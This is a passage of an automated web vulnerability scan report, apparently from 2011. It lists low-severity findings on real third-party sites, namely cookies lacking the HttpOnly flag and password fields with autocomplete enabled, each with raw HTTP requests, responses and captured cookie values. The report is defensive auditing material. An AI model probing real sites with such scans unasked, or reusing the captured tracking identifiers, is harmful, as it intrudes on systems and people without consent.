Set-Cookie: _OACAP[354]=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[785354]=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[63]=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[78563]=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[785]=1; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[354]=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[785354]=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[63]=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[78563]=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:32:25 GMT; path=/; domain=.lijit.com
Set-Cookie: ljt_reader=9a524261efe1e1588396f48f16471b3c; expires=Tue, 04-Sep-2012 02:32:26 GMT; path=/; domain=.lijit.com
Set-Cookie: OABLOCK=785.1315190065_354.deleted_785354.deleted_63.deleted_78563.deleted; expires=Wed, 05-Oct-2011 02:32:26 GMT; path=/; domain=.lijit.com
Set-Cookie: OACAP=785.10_354.1_785354.1_63.0_78563.0; expires=Tue, 04-Sep-2012 02:32:26 GMT; path=/; domain=.lijit.com
Set-Cookie: OASCAP=785.10_354.1_785354.1_63.0_78563.0; path=/; domain=.lijit.com
Content-Length: 43
Expires: Fri, 20 Mar 2009 21:49:56 GMT
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

11.120. http://vap3den1.lijit.com/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vap3den1.lijit.com
Path:   /www/delivery/lg.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/delivery/lg.php?bannerid=785&campaignid=301&cids=294,301&bids=600,785&zoneid=128348&channel_ids=,&OABLOCK=86400&OACAP=24&OASCAP=24&loc=http%3A%2F%2Fwww.w3schools.com%2Fjsref%2Ftryit.asp%3Ffilename%3Dtryjsref_anchor_name&referer=http%3A%2F%2Fwww.w3schools.com%2Fjsref%2Ftryit.asp%3Ffilename%3Dtryjsref_anchor_name&cb=330ba953d8 HTTP/1.1
Host: vap3den1.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/tryitbanner.asp?secid=tryjs&rnd=0.4732172
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_csync=rtb_turn%2Crtb_simplifi%2Crtb_mmath%2C1; ljt_reader=9a524261efe1e1588396f48f16471b3c; OABLOCK=785.1315190041; OACAP=785.8; OASCAP=785.8

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:34:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: _OABLOCK[785]=1315190047; expires=Wed, 05-Oct-2011 02:34:07 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[354]=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[785354]=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[63]=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[78563]=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[785]=1; expires=Tue, 04-Sep-2012 02:34:07 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[354]=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[785354]=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[63]=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[78563]=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[785]=1; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[354]=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[785354]=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[63]=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[78563]=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:34:06 GMT; path=/; domain=.lijit.com
Set-Cookie: ljt_reader=9a524261efe1e1588396f48f16471b3c354ad2131feae750e42ecbeb; expires=Tue, 04-Sep-2012 02:34:07 GMT; path=/; domain=.lijit.com
Set-Cookie: OABLOCK=785.1315190046_354.deleted_785354.deleted_63.deleted_78563.deleted; expires=Wed, 05-Oct-2011 02:34:07 GMT; path=/; domain=.lijit.com
Set-Cookie: OACAP=785.1_354.0_785354.0_63.0_78563.0; expires=Tue, 04-Sep-2012 02:34:07 GMT; path=/; domain=.lijit.com
Set-Cookie: OASCAP=785.7_354.1_785354.1_63.0_78563.0; path=/; domain=.lijit.com
Expires: Fri, 20 Mar 2009 21:49:56 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

11.121. http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barracudanetworks.com
Path:   /ns/products/web-site-firewall-overview.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ns/products/web-site-firewall-overview.php?&a=google-na_WebAppFirewallWW_WebApplicationSecurity&kw=web%20application%20security&gclid=CP2344L_g6sCFUsaQgodmjw72Q HTTP/1.1
Host: www.barracudanetworks.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: barra_tracking_code=google-na_WebAppFirewallWW_WebApplicationSecurity; path=/
Set-Cookie: barra_tracking_code_keyword=web+application+security; path=/
Set-Cookie: __debug=TDO; path=/
Set-Cookie: barra_referer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DHoulihan%2BLokey%23sclient%3Dpsy%26hl%3Den%26source%3Dhp%26q%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26pbx%3D1%26oq%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26aq%3Df%26aqi%3Dq-w1%26aql%3D%26gs_sm%3De%26gs_upl%3D21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1049%26bih%3D910; path=/
Set-Cookie: barra_hidden_menus=a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3Bi%3A1%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; expires=Tue, 04-Oct-2011 16:18:30 GMT; path=/
Date: Sun, 04 Sep 2011 16:18:29 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...

11.122. http://www.googleadservices.com/pagead/aclk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/aclk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/aclk?sa=L&ai=Cr3NFq6RjTqDGGefoiAK0_eSmD8S6gssCrI_QwzuhzbWBDggAEAIoA1CF1JuQBGDJnv6GyKP8GqABvPiqzAPIAQGqBB9P0OACKPfGOZE474fyYYALAxyFDkPxCyIwI3XX4gluugUTCOjY8Pr-g6sCFfMrQgodiCMgqMoFAA&ei=qqRjTujbJPPXiAKIx4DBCg&ved=0CA0Q0Qw&val=ChAyNmVhN2ZlZjBhNmNmNDNiELDC9fIEGgjt108vSV8oOyABKAAw88uL57LFh-j1ATjy4fjyBECTyY7zBA&sig=AOD64_3dhBkP3lko1-av5PaHwMtErzeJiw&adurl=https://www14.software.ibm.com/webapp/iwm/web/signup.do%3Fsource%3Dswg-grd-q34Cyberthreats_web%26csr%3Dagust_itexpwebcast-20110816%26cm%3Dk%26cr%3Dgoogle%26ct%3D101CG4TW%26S_TACT%3D101CG4TW%26ck%3Dsecurity_in_web_application%26cmp%3D101CG%26mkwid%3Ds65PPPOzV_15893774852_432pjo10484 HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Set-Cookie: Conversion=CqcBQ3IzTkZxNlJqVHFER0dlZm9pQUswX2VTbUQ4UzZnc3NDcklfUXd6dWh6YldCRGdnQUVBSW9BMUNGMUp1UUJHREpudjZHeUtQOEdxQUJ2UGlxekFQSUFRR3FCQjlQME9BQ0tQZkdPWkU0NzRmeVlZQUxBeHlGRGtQeEN5SXdJM1hYNGdsdXVnVVRDT2pZOFByLWc2c0NGZk1yUWdvZGlDTWdxTW9GQUESEwiAndeD_4OrAhUlGkIKHTYaOtEYASCd3OeBiaLeqc0BSAE; expires=Tue, 04-Oct-2011 16:18:05 GMT; path=/pagead/conversion/965393468/
Cache-Control: private
Location: https://www14.software.ibm.com/webapp/iwm/web/signup.do?source=swg-grd-q34Cyberthreats_web&csr=agust_itexpwebcast-20110816&cm=k&cr=google&ct=101CG4TW&S_TACT=101CG4TW&ck=security_in_web_application&cmp=101CG&mkwid=s65PPPOzV_15893774852_432pjo10484
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 04 Sep 2011 16:18:05 GMT
Server: AdClickServer
Content-Length: 0
X-XSS-Protection: 1; mode=block


11.123. http://www.hl.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hl.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.hl.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 04 Sep 2011 16:16:46 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: hlweb=SiteLanguage=1033; expires=Sat, 03-Dec-2011 17:16:46 GMT; path=/
Vary: Accept-Encoding
Content-Length: 12676


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Houlihan Lo
...[SNIP]...

11.124. http://www.hlhz.com/us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hlhz.com
Path:   /us/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/ HTTP/1.1
Host: www.hlhz.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 16:16:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /us/home.aspx?LangType=1033
Set-Cookie: hlweb=SiteLanguage=1033; expires=Sat, 03-Dec-2011 17:16:49 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 152

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fus%2fhome.aspx%3fLangType%3d1033">here</a>.</h2>
</body></html>

11.125. http://www.imiclk.com/cgi/r.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imiclk.com
Path:   /cgi/r.cgi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi/r.cgi?m=3&mid=882Mb6AW&ptid=SRCH&sp=1 HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://fls.doubleclick.net/activityi;src=2609787;type=skype282;cat=paids084;ord=1;num=1?
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.imiclk.com
Proxy-Connection: Keep-Alive
Cookie: OL8U=2-2-EF9B2A41DEF04F554DFEEE4881CDD96250BB8C439E5A250BACD1DD240C3E3E28-5B1171855FEBF9CA53EEC5CED3CC3B0B370C44EC2ADA7505A2A1FD8460D4D0D5; CH=30299,00000,28363,5djP6,30298,00000,36978,00000,30330,00000,22243,5djP6,31534,5djP6,31482,5djP6,31481,5djP6,30300,00000,32009,00000,32008,00000,30301,00000; YU=36bc66c588b6d76f9e5bf1dc0fc95649-5djP6

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.63 (CentOS)
P3P: policyref="/w3c/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
Location: http://ad.yieldmanager.com/pixel?adv=5787&t=2&id=717449&id=717450&code=bgy;cyp;i43;czl;A2b;dx1;dvk;cyr;ea8;dvg;ea7;ab50;cyq;dvl;cys
Cache-Control: no-store
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 21:13:42 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: CH=30299,00000,28363,5djP6,30298,00000,36978,00000,30330,00000,22243,5djP6,31534,5i91q,31482,5i91q,31481,5i91q,30300,00000,32009,00000,31477,00000,32008,00000,30301,00000; domain=.imiclk.com; path=/; expires=Mon, 03-Sep-2012 21:02:53 GMT
Set-Cookie: YU=f913638726d2c3d0729f66d3451f466d-5i91q; domain=.imiclk.com; path=/; expires=Mon, 03-Sep-2012 21:02:53 GMT
Content-Length: 13

<html></html>

11.126. http://www.lijit.com/beacon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /beacon

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /beacon?viewId=13151898886726b8b8a1ec2f8&rand=1315189888672&uri=http://www.lijit.com/users/w3schools&informer=7846666&type=fpads&loc=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_formattext&rr=http%3A//www.w3schools.com/js/tryit.asp%3Ffilename%3Dtryjs_formattext&ifr=1&v=1.0&csync=1 HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/tryitbanner.asp?secid=tryjs&rnd=0.1755792
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJUslIysjQytbQ0NrQwsjQ3NTE0MTc3VKoFAFC9Bds%3D; ljt_reader=9a524261efe1e1588396f48f16471b3c

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:51 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n10 ( lax-agg-n21), ms lax-agg-n21 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, max-age=0
Pragma: no-cache
Expires: Mon, 05 Sep 2011 02:30:51 GMT
Content-Length: 635
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Set-Cookie: ljt_csync=rtb_turn%2Crtb_simplifi%2Crtb_mmath%2C1; expires=Wed, 04-Sep-2013 02:30:51 GMT; path=/; domain=.lijit.com

<html>
   <head><title></title></head>
   <body>
                   <img src="http://ad.turn.com/server/pixel.htm?fpid=13&r=149046210" style="width:0px; height:0px;" width="0" height="0" />
                   <img src="http://um
...[SNIP]...

11.127. http://www.newsgator.com/images/ngsub1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /images/ngsub1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ngsub1.gif HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://heartbeat.skype.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.newsgator.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-control: no-cache="set-cookie"
Content-Type: image/gif
Date: Sun, 04 Sep 2011 21:04:07 GMT
ETag: "0d66e99e28cb1:0"
Last-Modified: Thu, 10 Jun 2010 21:19:24 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: AWSELB=D3C9758D18503E48094C60B777CFCD5D39CEEB1CDA0FEFFE2C0F391DFDF6C6C74534A9699883A5E60D6464D4DAF1C2655D53A3EFA246F758B0CA4603069175A255C2B80CD4;PATH=/;MAX-AGE=3600
X-Powered-By: ASP.NET
Content-Length: 1025
Connection: keep-alive

GIF89a[............fff).68.Y...d.A........q;{.B}.....................................6.B..................w.Y..e.........V.in.M.....=................................".................$............;.R.
...[SNIP]...

12. Password field with autocomplete enabled  previous  next
There are 4 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


12.1. https://mid.live.com/si/login.aspx/x22  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://mid.live.com
Path:   /si/login.aspx/x22

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /si/login.aspx/x22 HTTP/1.1
Host: mid.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 2491
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: lc=en-US; path=/
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 04 Sep 2011 21:48:27 GMT
Connection: close

<html>
<head>
<title>Windows Live ID</title>
<meta name="MobileOptimized" content="100"/>
<link type="text/css" rel="stylesheet" href="/hig.css"/>
</head>
<body>
<form id="EmailPasswordForm" name="EmailPasswordForm" method="post" action="login.aspx?__ufps=335502#InitPos">
<input type="hidden" name="__EVENTTARGET" value="">
...[SNIP]...
<div class="LeftRightBottomIndent"><input name="PasswordTextBox" maxlength="16" type="password"/><br>
...[SNIP]...

12.2. https://mid.live.com/si/login.aspx/x3c/cite/x3e/x3cspan  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://mid.live.com
Path:   /si/login.aspx/x3c/cite/x3e/x3cspan

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /si/login.aspx/x3c/cite/x3e/x3cspan HTTP/1.1
Host: mid.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 2560
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: lc=en-US; path=/
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 04 Sep 2011 21:48:29 GMT
Connection: close

<html>
<head>
<title>Windows Live ID</title>
<meta name="MobileOptimized" content="100"/>
<link type="text/css" rel="stylesheet" href="/hig.css"/>
</head>
<body>
<form id="EmailPasswordForm" name="EmailPasswordForm" method="post" action="login.aspx?__ufps=379169#InitPos">
<input type="hidden" name="__EVENTTARGET" value="">
...[SNIP]...
<div class="LeftRightBottomIndent"><input name="PasswordTextBox" maxlength="16" type="password"/><br>
...[SNIP]...

12.3. http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424053111904900904576549933849920392.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj HTTP/1.1
Host: online.wsj.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:17:18 GMT
Server: Apache/2.0.64 (Unix)
FastDynaPage-ServerInfo: sbkj2kapachep05 - Sun 09/04/11 - 09:07:13 EDT
Cache-Control: max-age=15
Expires: Sun, 04 Sep 2011 16:17:33 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Length: 191170
Content-Type: text/html; charset=UTF-8

